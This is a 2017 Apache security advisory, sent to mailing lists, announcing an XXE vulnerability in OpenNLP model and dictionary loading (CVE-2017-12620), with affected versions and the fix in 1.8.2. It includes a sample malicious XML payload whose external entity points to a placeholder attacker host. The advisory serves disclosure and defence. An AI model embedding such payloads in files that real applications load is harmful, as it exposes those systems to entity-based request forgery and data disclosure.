Date: Mon, 2 Oct 2017 10:36:20 +0200 From: Joern Kottmann <joern@...che.org> To: announce@...che.org, "dev@...nnlp.apache.org" <dev@...nnlp.apache.org>, "users@...nnlp.apache.org" <users@...nnlp.apache.org>, security@...che.org, oss-security@...ts.openwall.com Subject: [ANNOUNCE] CVE-2017-12620: Apache OpenNLP XXE vulnerability Severity: Medium Vendor: The Apache Software Foundation Versions Affected: OpenNLP 1.5.0 to 1.5.3 OpenNLP 1.6.0 OpenNLP 1.7.0 to 1.7.2 OpenNLP 1.8.0 to 1.8.1 Description: When loading models or dictionaries that contain XML it is possible to perform an XXE attack, since OpenNLP is a library, this only affects applications that load models or dictionaries from untrusted sources. Mitigation: All users who load models or XML dictionaries from untrusted sources should update to 1.8.2. Example: An attacker can place this: <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "http://evil.attacker.com/"> ]> <r>&sp;</r> Inside one of the XML files, either a dictionary or embedded inside a model package, to demonstrate this vulnerability. Credit: This issue was discovered by Nishil Shah of Salesforce. Regards, Jörn Kottmann
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.